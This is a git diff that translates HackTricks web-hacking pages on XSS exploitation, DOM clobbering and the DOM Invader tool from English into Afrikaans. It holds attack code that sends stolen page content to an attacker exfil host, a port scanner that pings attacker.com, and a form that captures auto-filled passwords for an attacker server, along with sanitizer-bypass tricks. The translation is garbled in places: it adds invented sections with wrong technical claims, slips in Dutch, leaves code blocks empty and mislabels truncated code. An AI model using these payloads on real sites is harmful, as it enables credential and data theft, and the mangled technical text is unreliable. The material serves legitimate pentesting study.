+Jy **sal nie toegang hê tot die koekies vanaf JavaScript** as die HTTPOnly-vlag in die koekie ingestel is nie. Maar hier het jy [sommige maniere om hierdie beskerming te omseil](../hacking-with-cookies/#httponly) as jy gelukkig genoeg is.
 {% endhint %}
 
-### Steal Page Content
-
+### Steel Bladsy-inhoud
 ```javascript
 var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
 var attacker = "http://10.10.14.8/exfil";
 var xhr  = new XMLHttpRequest();
 xhr.onreadystatechange = function() {
-    if (xhr.readyState == XMLHttpRequest.DONE) {
-        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
-    }
+if (xhr.readyState == XMLHttpRequest.DONE) {
+fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
+}
 }
 xhr.open('GET', url, true);
 xhr.send(null);
 ```
+### Vind interne IP-adresse
 
-### Find internal IPs
+Om interne IP-adresse te vind, kan jy die volgende tegnieke gebruik:
 
+#### 1. DNS-terugvoer
+
+As jy toegang het tot 'n DNS-diens wat interne IP-adresse terugvoer, kan jy dit gebruik om die interne IP-adresse van 'n teikenstelsel te vind. Voer 'n DNS-navraag uit vir die teikenstelsel se domeinnaam en kyk na die terugvoer vir enige interne IP-adresse wat verskyn.
+
+#### 2. ARP-spoofing
+
+Deur ARP-spoofing te gebruik, kan jy die ARP-tabel van 'n teikenstelsel manipuleer om die interne IP-adresse van ander toestelle in die netwerk te sien. Deur die ARP-tabel te onderskep en te analiseer, kan jy die interne IP-adresse van die teikenstelsel en ander toestelle in die netwerk vind.
+
+#### 3. Netwerkkaartspoofing
+
+Met netwerkkaartspoofing kan jy jou netwerkkaart se MAC-adres vervals om toegang te verkry tot die interne netwerk. Deur jou netwerkkaart se MAC-adres te vervals, kan jy die interne IP-adresse van ander toestelle in die netwerk sien.
+
+#### 4. Netwerkverkenning
+
+Deur netwerkverkenningstegnieke soos portskandering en netwerkkaartspoofing te gebruik, kan jy die interne IP-adresse van toestelle in die netwerk identifiseer. Deur die netwerk te skandeer vir aktiewe toestelle en die IP-adresse te analiseer, kan jy die interne IP-adresse van die teikenstelsel vind.
+
+Onthou om altyd wettige en etiese hackingpraktyke te volg en slegs toestemming te verkry om hierdie tegnieke op 'n netwerk toe te pas.
 ```html
 
 ```
+### Poortskander (haal op)
 
-### Port Scanner (fetch)
+Hierdie tegniek maak gebruik van 'n fetch-versoek om te bepaal of 'n spesifieke poort oop of toe is op 'n teikenbediener. Dit kan nuttig wees tydens pentesting om te bepaal watter poorte oop is en moontlike aanvalsveilighede te identifiseer.
 
+#### Gebruik
+
+Voer die volgende kode in die konsol van die webblaaier in:
+
+```javascript
+fetch('http://target-server.com:port')
+  .then(response => {
+    if (response.ok) {
+      console.log('Poort is oop');
+    } else {
+      console.log('Poort is toe');
+    }
+  })
+  .catch(error => {
+    console.log('Fout tydens versoek:', error);
+  });
+```
+
+Vervang `target-server.com` met die teikenbediener se URL en `port` met die poortnommer wat jy wil skandeer.
+
+#### Opmerkings
+
+- Hierdie tegniek maak gebruik van die `fetch`-funksie in JavaScript om 'n HTTP-versoek na die teikenbediener te stuur.
+- As die versoek suksesvol is en die teikenbediener 'n geldige antwoord gee (HTTP-statuskode 200), beteken dit dat die poort oop is.
+- As die versoek nie suksesvol is nie (HTTP-statuskode 404, 500, ens.), beteken dit dat die poort toe is of dat daar 'n fout opgetree het.
+- Dit is belangrik om te onthou dat hierdie tegniek slegs die status van die poort bepaal en nie die veiligheid van die teikenbediener self beoordeel nie.
 ```javascript
 const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
 ```
+### Poortskander (websockets)
 
-### Port Scanner (websockets)
+Hierdie tegniek maak gebruik van websockets om 'n poortskandering uit te voer op 'n doelwitbediener. Websockets is 'n kommunikasieprotokol wat toelaat vir vol-duplex kommunikasie tussen 'n kliënt en 'n bediener oor 'n enkele TCP-verbinding.
 
+#### Hoe werk dit?
+
+1. Die aanvaller stel 'n webtoepassing op wat websockets ondersteun.
+2. Die aanvaller maak 'n verbinding met die webtoepassing en stel 'n websockets-kanaal op.
+3. Die aanvaller stuur 'n versoek na die doelwitbediener se poort om te kyk of dit oop of gesluit is.
+4. As die poort oop is, sal die bediener 'n suksesvolle verbinding bevestig.
+5. Die aanvaller kan dan die resultate van die poortskandering analiseer en verdere aanvalstegnieke implementeer.
+
+#### Voordele
+
+- Websockets maak dit moontlik om poortskandering uit te voer sonder om 'n eksterne skanderingshulpmiddel te gebruik.
+- Dit kan nuttig wees in situasies waar 'n tradisionele poortskandering geblokkeer word, maar websockets toegelaat word.
+
+#### Beperkings
+
+- Hierdie tegniek is afhanklik van die doelwitbediener wat websockets ondersteun.
+- Dit kan slegs gebruik word om die status van 'n enkele poort te bepaal en nie om 'n volledige skandering van alle poorte uit te voer nie.
+
+#### Voorbeeld
+
+```html
+
+```
+
+In hierdie voorbeeld maak die aanvaller 'n websockets-verbinding met die doelwitbediener en stuur 'n HTTP-versoek na die doelwitbediener se poort. As die bediener 'n suksesvolle verbinding bevestig deur 'n "200 OK" antwoord terug te stuur, weet die aanvaller dat die poort oop is.
 ```python
 var ports = [80, 443, 445, 554, 3306, 3690, 1234];
 for(var i=0; i::placeholder { color:white; }
 ```
+### Opname van outomatiese invul wagwoorde
 
-### Auto-fill passwords capture
+Auto-fill passwords is 'n handige funksie wat deur baie webblaaierplatforms aangebied word. Dit stel gebruikers in staat om wagwoorde outomaties in te vul wanneer hulle aanmeld by 'n webwerf. Hierdie funksie kan egter 'n veiligheidsrisiko inhou, veral as dit gekombineer word met 'n XSS-aanval (Cross-Site Scripting).
 
+Met 'n XSS-aanval kan 'n aanvaller skadelike kode insluit in 'n webwerf se invoerveld. As 'n gebruiker dan die webwerf besoek en die invoerveld gebruik, sal die skadelike kode uitgevoer word. As die webwerf 'n outomatiese invul wagwoordfunksie het, kan die aanvaller die wagwoord van die gebruiker onderskep en dit na 'n eksterne bediener stuur.
+
+Om outomatiese invul wagwoorde te onderskep, kan 'n aanvaller gebruik maak van verskillende tegnieke, soos die insluiting van 'n skadelike skripsie in 'n webwerf se invoerveld of die gebruik van 'n skadelike URL wat die wagwoord onderskep wanneer dit outomaties ingevul word.
+
+Dit is belangrik vir webwerfontwikkelaars om bewus te wees van hierdie risiko en om gepaste maatreëls te tref om dit te voorkom. Dit kan insluit die korrekte hantering van gebruikersinsette, die gebruik van beveiligingsmaatreëls soos inhoudsbeveiligingsbeleide (Content Security Policy) en die deaktivering van outomatiese invul wagwoorde.
+
+Gebruikers kan ook hulself beskerm teen hierdie tipe aanvalle deur nie outomatiese invul wagwoorde te gebruik nie en deur bewus te wees van die risiko's van XSS-aanvalle. Dit sluit in om nie op verdagte skakels te klik nie en om slegs vertroude webwerwe te besoek.
+
+As 'n pentester is dit belangrik om bewus te wees van hierdie tegniek en om dit te gebruik om die veiligheid van 'n webwerf te evalueer.
 ```javascript
 Username:

 
@@ -1294,20 +1414,18 @@ mode: 'no-cors',
 body:username.value+':'+this.value
 });">
 ```
+Wanneer enige data in die wagwoordveld ingevoer word, word die gebruikersnaam en wagwoord na die aanvaller se bediener gestuur, selfs as die klient 'n gestoorde wagwoord kies en niks skryf nie, sal die geloofsbriewe uitgelek word.
 
-When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
+### Sleutellogger
 
-### Keylogger
-
-Just searching in github I found a few different ones:
+Deur net op GitHub te soek, het ek 'n paar verskillende eenhede gevind:
 
 * [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
 * [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
 * [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
-* You can also use metasploit `http_javascript_keylogger`
-
-### Stealing CSRF tokens
+* Jy kan ook metasploit gebruik `http_javascript_keylogger`
 
+### Steel CSRF-tokens
 ```javascript
 
 ```
+### Steel PostMessage-boodskappe
 
-### Stealing PostMessage messages
+PostMessage is 'n API wat gebruik word om boodskappe tussen vensters te stuur in 'n webtoepassing. Dit kan egter ook misbruik word deur 'n aanvaller om boodskappe te steel wat tussen vensters gestuur word.
 
+#### Hoe werk dit?
+
+Wanneer 'n webtoepassing PostMessage gebruik om 'n boodskap na 'n ander venster te stuur, word die boodskap as 'n objek gestruktureer en deur die `postMessage`-funksie gestuur. Die ontvangende venster kan dan die boodskap onderskep en die inhoud daarvan gebruik.
+
+'n Aanvaller kan hierdie funksionaliteit misbruik deur 'n kwaadwillige webtoepassing te skep wat 'n venster oopmaak en 'n PostMessage-boodskap stuur na 'n ander venster wat die aanvaller wil teiken. As die aanvaller die boodskap kan onderskep, kan hy die inhoud daarvan steel en dit vir sy eie voordeel gebruik.
+
+#### Hoe om PostMessage-diefstal te voorkom?
+
+Om PostMessage-diefstal te voorkom, moet die volgende maatreëls in ag geneem word:
+
+1. Vertrou nie blindeel vensters nie: Moenie blindeel vensters oopmaak en PostMessage-boodskappe stuur sonder om die inhoud van die venster te verifieer nie. Dit kan aanvallers die geleentheid bied om boodskappe te steel.
+
+2. Verifieer die oorsprong van die venster: Voordat 'n PostMessage-boodskap aan 'n ander venster gestuur word, moet die oorsprong van die venster geverifieer word. Dit kan gedoen word deur die `origin`-parameter van die `postMessage`-funksie te gebruik.
+
+3. Gebruik 'n veilige kommunikasiekanale: As die PostMessage-boodskap gevoelige inligting bevat, moet 'n veilige kommunikasiekanale, soos HTTPS, gebruik word om die boodskap te stuur. Dit sal die risiko van inligtingsoortdring verminder.
+
+Deur hierdie maatreëls te volg, kan die risiko van PostMessage-diefstal verminder word en kan die veiligheid van webtoepassings verbeter word.
 ```markup
 
 
 ```
-
-### Abusing Service Workers
+### Misbruik van dienswerkers
 
 {% content-ref url="abusing-service-workers.md" %}
 [abusing-service-workers.md](abusing-service-workers.md)
 {% endcontent-ref %}
 
-### Accessing Shadow DOM
+### Toegang tot Shadow DOM
 
 {% content-ref url="shadow-dom.md" %}
 [shadow-dom.md](shadow-dom.md)
@@ -1349,10 +1484,9 @@ function handleResponse() {
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
 
-### Blind XSS payloads
-
-You can also use: [https://xsshunter.com/](https://xsshunter.com)
+### Blinde XSS-payloads
 
+Jy kan ook gebruik maak van: [https://xsshunter.com/](https://xsshunter.com)
 ```markup
 ">
 ">
@@ -1363,7 +1497,7 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
 ">
 
 
-">
 
 
 ```
-
 {% hint style="warning" %}
-The style tag is used to **give enough time to the iframe to render**. Without it you will find an alert of **undefined**.
+Die style-etiket word gebruik om genoeg tyd te gee vir die iframe om te render. Sonder dit sal jy 'n waarskuwing van 'undefined' kry.
 {% endhint %}
 
-To clobber deeper attributes, you can use **iframes with html encoding** this way:
-
+Om dieper eienskappe te oorskryf, kan jy iframes met HTML-kodering gebruik op die volgende manier:
 ```html
 
 
@@ -76,11 +65,9 @@ To clobber deeper attributes, you can use **iframes with html encoding** this wa
 alert(a.b.c.d.e)//controlled
 
 ```
-
 ### **Filter Bypassing**
 
-If a filter is **looping** through the **properties** of a node using something like `document.getElementByID('x').attributes` you could **clobber** the attribute **`.attributes`** and **break the filter**. Other DOM properties like **`tagName`** , **`nodeName`** or **`parentNode`** and more are also **clobberable**.
-
+As 'n filter deur die **eienskappe** van 'n nodus **loop** deur iets soos `document.getElementByID('x').attributes`, kan jy die eienskap **`.attributes`** **oorheers** en die filter **breek**. Ander DOM-eienskappe soos **`tagName`**, **`nodeName`** of **`parentNode`** en meer is ook **oorheersbaar**.
 ```html
 

 

@@ -91,56 +78,48 @@ console.log(document.getElementById('x').nodeName)//FORM
 console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
 
 ```
-
 ## **Clobbering `window.someObject`**
 
-In JavaScript it's common to find:
-
+In JavaScript is dit algemeen om te vind:
 ```javascript
 var someObject = window.someObject || {};
 ```
-
-Manipulating HTML on the page allows overriding `someObject` with a DOM node, potentially introducing security vulnerabilities. For example, you can replace `someObject` with an anchor element pointing to a malicious script:
-
+Die manipulasie van HTML op die bladsy maak dit moontlik om `someObject` te oorskryf met 'n DOM-node, wat potensiële sekuriteitskwessies kan veroorsaak. Byvoorbeeld, jy kan `someObject` vervang met 'n anker-element wat na 'n skadelike skrips verwys:
 ```html
 
 ```
-
-In a vulnerable code such as:
-
+In 'n kwesbare kode soos:
 ```html
 
 ```
+Hierdie metode maak gebruik van die skripsbron om ongewenste kode uit te voer.
 
-This method exploits the script source to execute unwanted code.
+**Truuk**: **`DOMPurify`** stel jou in staat om die **`cid:`** protokol te gebruik, wat **dubbele aanhalingstekens nie URL-kodeer nie**. Dit beteken dat jy 'n gekodeerde dubbele aanhalingsteken kan inspuit wat tydens uitvoering gedekodeer sal word. Daarom sal die inspuiting van iets soos **``** die HTML-gekodeerde `"` **tydens uitvoering gedekodeer** en **ontsnap** uit die attribuutwaarde om die **`onerror`** gebeurtenis te **skep**.
 
-**Trick**: **`DOMPurify`** allows you to use the **`cid:`** protocol, which **does not URL-encode double-quotes**. This means you can **inject an encoded double-quote that will be decoded at runtime**. Therefore, injecting something like **``** will make the HTML encoded `"` to be **decoded on runtime** and **escape** from the attribute value to **create** the **`onerror`** event.
+'n Ander tegniek maak gebruik van 'n **`form`** element. Sekere kliëntkant-biblioteke ondersoek die eienskappe van 'n nuut geskepte vormelement om dit skoon te maak. Deur egter 'n `input` met `id=attributes` binne die vorm by te voeg, oorskryf jy effektief die eienskappe-eienskap en voorkom dat die sanitiseerder toegang tot die werklike eienskappe verkry.
 
-Another technique uses a **`form`** element. Certain client-side libraries inspect the attributes of a newly created form element to clean them. However, by adding an `input` with `id=attributes` inside the form, you effectively overwrite the attributes property, preventing the sanitizer from accessing the actual attributes.
+Jy kan 'n voorbeeld van hierdie tipe oorskrywing in hierdie CTF-verslag [**vind**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
 
-You can [**find an example of this type of clobbering in this CTF writeup**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
+## Oorskryf van die dokumentobjek
 
-## Clobbering document object
+Volgens die dokumentasie is dit moontlik om eienskappe van die dokumentobjek te oorskryf deur gebruik te maak van DOM-oorskrywing:
 
-According to the documentation it's possible to overwrite attributes of the document object using DOM Clobbering:
-
-> The [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interface [supports named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties). The [supported property names](https://webidl.spec.whatwg.org/#dfn-supported-property-names) of a [Document](https://html.spec.whatwg.org/multipage/dom.html#document) object document at any moment consist of the following, in [tree order](https://dom.spec.whatwg.org/#concept-tree-order) according to the element that contributed them, ignoring later duplicates, and with values from [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) attributes coming before values from name attributes when the same element contributes both:
+> Die [Document](https://html.spec.whatwg.org/multipage/dom.html#document) koppelvlak [ondersteun genoemde eienskappe](https://webidl.spec.whatwg.org/#dfn-support-named-properties). Die [ondersteunde eienskapsname](https://webidl.spec.whatwg.org/#dfn-supported-property-names) van 'n [Document](https://html.spec.whatwg.org/multipage/dom.html#document)-objektdokument op enige oomblik bestaan uit die volgende, in [boomvolgorde](https://dom.spec.whatwg.org/#concept-tree-order) volgens die element wat dit bydra, waarby latere duplikate geïgnoreer word, en met waardes van [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-eienskappe wat voor waardes van naam-eienskappe kom wanneer dieselfde element beide bydra:
 >
-> \- The value of the name content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), and [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty name content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\
+> \- Die waarde van die naam-inhoudseienskap vir alle [blootgestelde](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), en [blootgestelde](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element)-elemente wat 'n nie-leë naam-inhoudseienskap het en [in 'n dokumentboom](https://dom.spec.whatwg.org/#in-a-document-tree) met die dokument as hul [wortel](https://dom.spec.whatwg.org/#concept-tree-root) is;\
 > \
-> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\
+> \- Die waarde van die [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap vir alle [blootgestelde](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element)-elemente wat 'n nie-leë [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap het en [in 'n dokumentboom](https://dom.spec.whatwg.org/#in-a-document-tree) met die dokument as hul [wortel](https://dom.spec.whatwg.org/#concept-tree-root) is;\
 > \
-> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elements that have both a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and a non-empty name content attribute, and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root).
-
-Using this technique you can overwrite commonly used **values such as `document.cookie`, `document.body`, `document.children`**, and even methods in the Document interface like `document.querySelector`.
+> \- Die waarde van die [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap vir alle [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element)-elemente wat beide 'n nie-leë [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute)-inhoudseienskap en 'n nie-leë naam-inhoudseienskap het, en [in 'n dokumentboom](https://dom.spec.whatwg.org/#in-a-document-tree) met die dokument as hul [wortel](https://dom.spec.whatwg.org/#concept-tree-root) is.
 
+Met behulp van hierdie tegniek kan jy algemeen gebruikte **waardes soos `document.cookie`, `document.body`, `document.children`** en selfs metodes in die Document-koppelvlak soos `document.querySelector` oorskryf.
 ```javascript
 document.write("")
 
@@ -159,11 +138,9 @@ HTMLCollection(2) [img, form, cookie: img]
 typeof(document.cookie)
 'object
 ```
+## Skryf nadat die element oorskryf is
 
-## Writing after the element clobbered
-
-The results of calls to **`document.getElementById()`** and **`document.querySelector()`** can be altered by injecting a `` or `` tag with an identical id attribute. Here's how it can be done:
-
+Die resultate van oproepe na **`document.getElementById()`** en **`document.querySelector()`** kan verander word deur 'n `` of `` tag in te spuit met 'n identiese id-eienskap. Hier is hoe dit gedoen kan word:
 ```html
 
 

@@ -173,9 +150,7 @@ alert(document.getElementById('cdnDomain').innerText); // Clobbered
 alert(document.querySelector('.x').innerText); // Clobbered
 
 ```
-
-Furthermore, by employing styles to hide these injected HTML/body tags, interference from other text in the `innerText` can be prevented, thus enhancing the efficacy of the attack:
-
+Verder kan de doeltreffendheid van de aanval worden verbeterd door stijlen te gebruiken om deze ingevoegde HTML/body-tags te verbergen en interferentie van andere tekst in de `innerText` te voorkomen:
 ```html
 

 
existing text

@@ -187,9 +162,7 @@ p{display:none;}
 alert(document.getElementById('cdnDomain').innerText); // Clobbered
 
 ```
-
-Investigations into SVG revealed that a `` tag can also be utilized effectively:
-
+Ondersoeke na SVG het aan die lig gebring dat 'n ``-etiket ook doeltreffend gebruik kan word:
 ```html
 
 clobbered
@@ -197,9 +170,7 @@ Investigations into SVG revealed that a `` tag can also be utilized effect
 alert(document.getElementById('cdnDomain').innerText); // Clobbered
 
 ```
-
-For the HTML tag to function within SVG in browsers like Chrome and Firefox, a `` tag is necessary:
-
+Vir die HTML-etiket om binne SVG te funksioneer in webblaaier soos Chrome en Firefox, is 'n ``-etiket nodig:
 ```html
 
 
@@ -211,11 +182,9 @@ For the HTML tag to function within SVG in browsers like Chrome and Firefox, a `
 alert(document.getElementById('cdnDomain').innerText); // Clobbered
 
 ```
+## Oorweldiging van Vorms
 
-
-## Clobbering Forms
-
-It's possible to add **new entries inside a form** just by **specifying the `form` attribute** inside some tags. You can use this to **add new values inside a form** and to even add a new **button** to **send it** (clickjacking or abusing some `.click()` JS code):
+Dit is moontlik om **nuwe inskrywings binne 'n vorm** by te voeg deur eenvoudig die `form` attribuut te spesifiseer binne sekere etikette. Jy kan dit gebruik om **nuwe waardes binne 'n vorm** by te voeg en selfs 'n nuwe **knoppie** om dit te **stuur** (clickjacking of misbruik van sommige `.click()` JS-kode):
 
 {% code overflow="wrap" %}
 ```html
@@ -229,22 +198,22 @@ Click to send!
 ```
 {% endcode %}
 
-* For more form attributes in [**button check this**](https://www.w3schools.com/tags/tag\_button.asp)**.**
+* Vir meer vormatribute in [**knoppie kyk hierdie**](https://www.w3schools.com/tags/tag\_button.asp)**.**
 
-## References
+## Verwysings
 
 * [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
 * [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
-* Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
+* Heyes, Gareth. JavaScript vir hackers: Leer om soos 'n hacker te dink.
 
 

 
-
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 
diff --git a/pentesting-web/xss-cross-site-scripting/dom-invader.md b/pentesting-web/xss-cross-site-scripting/dom-invader.md
index 22d8071b9..9c94118f8 100644
--- a/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -2,96 +2,94 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 ## DOM Invader
 
-DOM Invader is a browser tool installed in Burp's inbuilt browser. It assists in **detecting DOM XSS vulnerabilities** using various sources and sinks, including web messages and prototype pollution. The tool is preinstalled as an extension.
+DOM Invader is 'n blaaierhulpmiddel wat in Burp se ingeboude blaaier geïnstalleer is. Dit help om **DOM XSS-gebreklikhede** op te spoor deur gebruik te maak van verskillende bronne en sappe, insluitend webboodskappe en prototipevervuiling. Die hulpmiddel is vooraf geïnstalleer as 'n uitbreiding.
 
-DOM Invader integrates a tab within the browser's DevTools panel enabling the following:
+DOM Invader integreer 'n oortjie binne die blaaier se DevTools-paneel wat die volgende moontlik maak:
 
-1. **Identification of controllable sinks** on a webpage for DOM XSS testing, providing context and sanitization details.
-2. **Logging, editing, and resending web messages** sent via the `postMessage()` method for DOM XSS testing. DOM Invader can also auto-detect vulnerabilities using specially crafted web messages.
-3. Detection of **client-side prototype pollution** sources and scanning of controllable gadgets sent to risky sinks.
-4. Identification of **DOM clobbering vulnerabilities**.
+1. **Identifikasie van beheerbare sappe** op 'n webbladsy vir DOM XSS-toetsing, met konteks- en sanitiseringsbesonderhede.
+2. **Log, wysig en herstuur webboodskappe** wat gestuur word via die `postMessage()`-metode vir DOM XSS-toetsing. DOM Invader kan ook outomaties kwesbaarhede opspoor deur spesiaal vervaardigde webboodskappe.
+3. Opsoek na **kliëntkant prototipevervuiling**-bronne en skandering van beheerbare gadgets wat na risikovolle sappe gestuur word.
+4. Identifikasie van **DOM-oorvleuelingsgebreklikhede**.
 
-### Enable It
+### Aktiveer dit
 
-In the Burp's builtin browser go to the **Burp extension** and enable it:
+Gaan na die **Burp-uitbreiding** in die ingeboude blaaier en aktiveer dit:
 
 

 
-Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
+Vernuwe die bladsy en in die **Dev Tools** sal jy die **DOM Invader-oortjie vind:**
 
 

 
-### Inject a Canary
+### Voeg 'n Canary in
 
-In the previous image you can see a **random group of chars, that is the Canary**. You should now start **injecting** it in different parts of the web (params, forms, url...) and each time click search it. DOM Invader will check if the **canary ended in any interesting sink** that could be exploited.
+In die vorige prent kan jy 'n **willekeurige groep karakters sien, dit is die Canary**. Jy moet dit nou begin **inspuit** in verskillende dele van die web (parameters, vorms, URL...) en elke keer daarop klik om dit te soek. DOM Invader sal nagaan of die **canary in enige interessante sap geëindig het** wat uitgebuit kan word.
 
-Moreover, the options **Inject URL params** and Inject forms will automatically open a **new tab** **injecting** the **canary** in every **URL** param and **form** it finds.
+Verder sal die opsies **Inject URL parameters** en **Inject forms** outomaties 'n **nuwe oortjie** oopmaak deur die **canary** in elke **URL-parameter** en **vorm** wat dit vind, in te spuit.
 
-### Inject an empty Canary
+### Voeg 'n leë Canary in
 
-If you just want to find potential sinks the page might have, even if they aren't exploitable, you can **search for an empty canary**.
+As jy net potensiële sappe wil vind wat die bladsy mag hê, selfs al is hulle nie uitbuitbaar nie, kan jy soek na 'n leë canary.
 
-### Post Messages
+### Stuur boodskappe
 
